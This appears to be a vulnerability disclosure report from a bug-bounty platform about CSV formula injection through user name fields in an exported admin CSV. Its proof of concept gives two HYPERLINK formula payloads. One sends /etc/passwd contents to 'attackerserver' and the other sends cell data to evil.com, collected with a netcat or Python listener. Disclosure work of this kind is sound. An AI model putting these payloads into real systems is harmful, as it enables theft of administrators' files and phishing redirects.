Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File

2022-04-0117:54:17

sampritdas8

www.huntr.dev

formula injection

csv injection

improper neutralization

csv file

firstname

lastname

payloads

hyperlink

attackerserver

port

evil.com

python server

netcat listener

system

users

export data

download export

personal info

EPSS

0.001

Percentile

49.0%

JSON

Description

Formula Injection/CSV Injection in “Firstname” & “Lastname” due to Improper Neutralization of Formula Elements in CSV File.

Proof of Concept

1.Go to a Preferences from the user account and in Personal info of “Firstname” & “Lastname” insert the below payloads.

2.Payloads:-

=HYPERLINK(CONCATENATE(“http://attackerserver:port/a.txt?v=”; (‘file:///etc/passwd’#$passwd.A1)); “poc”)

=HYPERLINK(“http://evil.com?x=“&A3&”,“&B3&”[CR]","Error fetching info: Click me to resolve.”)

4.Start your python server or Netcat listener.

3.Then from admin account go to “System” -> “Users” => “three dot”-> click on “Export Data” and select “CSV” in “Format” -> “Generate export” -> “Download Export”

4.Open the downloaded CSV and click on poc and Error fetching info: Click me to resolve. you will see that attacker able to get /etc/passwd of admin system and also he will get redirected to evil.com.